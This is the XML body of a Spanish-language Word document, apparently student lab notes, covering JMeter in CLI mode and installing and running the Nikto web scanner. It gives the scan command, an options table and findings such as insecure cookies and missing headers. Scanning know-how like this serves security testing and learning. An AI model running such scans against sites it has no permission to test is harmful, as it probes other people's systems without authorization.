            <wp:extent cx="7202170" cy="4033802"/>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38773" cy="4054302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F1EBB" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>JMETER en modo CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451ABF7B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3453B6EA" wp14:editId="25897524">
            <wp:extent cx="7206757" cy="214194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95929" cy="2168445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E309977" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197C4486" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5D776F" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FBBC45A" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7168812A" w14:textId="77777777" w:rsidR="006C3776" w:rsidRPr="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C3776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reporte Generado del modo CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51302B9B" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441BCD81" wp14:editId="102800D7">
            <wp:extent cx="7100521" cy="3543030"/>
            <wp:effectExtent l="0" t="0" r="571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12434" cy="3548975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005C32F" w14:textId="77777777" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:ind w:left="-1418"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EF715F" w14:textId="52FEA2DC" w:rsidR="006C3776" w:rsidRDefault="006C3776" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBAA35F" w14:textId="4C1A37FF" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E30C3A" w14:textId="3558D7B3" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C57C492" w14:textId="3E1CE703" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D72CFD" w14:textId="5AE5CA03" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C83C8B4" w14:textId="26B785A6" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698EE620" w14:textId="2A1F5C00" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101947F1" w14:textId="34E99728" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0058B2A0" w14:textId="65C9567A" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7807628E" w14:textId="4E5CE0D0" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="006C3776">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9C55A3" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A124B" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Instalación de Nikto en Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E35B1" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Requisitos:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>- Tener instalado Perl (recomendado: Strawberry Perl).</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Pasos:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>1. Descargar e instalar Strawberry Perl desde https://strawberryperl.com/.</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Descargar Nikto desde GitHub: git clone https://github.com/sullo/nikto.git</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>3. Acceder a la carpeta program/ donde se encuentra nikto.pl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AE9B39" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A124B" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Inspección Completa de un Sitio Web con Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40859DF8" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Paso 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Abrir la terminal (CMD o PowerShell)</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Paso 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Navegar a la carpeta de Nikto</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>cd C:\ruta\donde\descargaste\nikto\program</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Paso 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejecutar Nikto sobre un objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>perl nikto.pl -h https://www.ejemplo.com</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
        <w:t>Parámetros opcionales importantes:</w:t>
      </w:r>
      <w:r w:rsidRPr="006A7E77">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr w:rsidR="00774B16" w14:paraId="6398E2F0" w14:textId="77777777" w:rsidTr="009911DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6109F8C6" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:t>Parámetro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5699C149" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00774B16" w:rsidRPr="001D1995" w14:paraId="7B272495" w14:textId="77777777" w:rsidTr="009911DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B46EDB8" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:t>-h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B1AB88F" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E77">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Especifica el host objetivo (puede ser IP o dominio).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00774B16" w:rsidRPr="001D1995" w14:paraId="3BA20149" w14:textId="77777777" w:rsidTr="009911DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27B351DB" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:t>-p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2557FD6D" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E77">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Especifica el puerto a escanear (por defecto, 80 para HTTP y 443 para HTTPS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00774B16" w:rsidRPr="001D1995" w14:paraId="0CA26723" w14:textId="77777777" w:rsidTr="009911DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51181A52" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:t>-o</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B69C99" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E77">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Guarda la salida del escaneo en un archivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00774B16" w:rsidRPr="001D1995" w14:paraId="14A67B75" w14:textId="77777777" w:rsidTr="009911DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D5B5D1D" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:t>-Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4510129A" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E77">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Especifica el formato de salida (txt, html, xml, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00774B16" w:rsidRPr="001D1995" w14:paraId="1348F477" w14:textId="77777777" w:rsidTr="009911DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DB055B" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>-ssl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A694355" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A7E77" w:rsidRDefault="00774B16" w:rsidP="009911DB">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A7E77">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fuerza el uso de SSL para conexiones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70D731E0" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="006A124B" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA14481" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:r w:rsidRPr="008916D2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="630D33D7" wp14:editId="0C8AA7EF">
            <wp:extent cx="5943600" cy="2339340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="33386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011" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2339340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDD284" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774B16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cookies sin secure ni httponly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1200FF" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774B16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Falta de headers de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BD17D1" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774B16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Riesgo de breach attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38479D52" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774B16">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Apache sin ocultar version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B17F3" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E5933B9" wp14:editId="7F220703">
            <wp:extent cx="5943600" cy="2145030"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="15716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395" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2145030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8291DA" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Con este comando guardamos los r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">esultados e un archivo de texto </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75224A75" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5773F0E1" wp14:editId="15ECCC12">
            <wp:extent cx="5943600" cy="207010"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1178490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0308" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="207010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F6AC8" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Con este comando especificamos el formato en el que queremos que se guarden los resultados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C00534B" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="385D8A55" wp14:editId="7790B6C4">
            <wp:extent cx="5943600" cy="360045"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="96255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3955" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="360045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33885FE1" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escaneo en un puerto explicito en este caso el puerto 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3097E" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A124B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05C07FE2" wp14:editId="44F6AC2F">
            <wp:extent cx="5943600" cy="1989455"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1711610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0876" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1989455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FD693" w14:textId="77777777" w:rsidR="00774B16" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Se fuerza a usar el protocolo de seguridad ssl, es por esos que en el ejemplo no usamos el https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2877C143" w14:textId="77777777" w:rsidR="00774B16" w:rsidRPr="008C5A15" w:rsidRDefault="00774B16" w:rsidP="00774B16">
      <w:pPr>
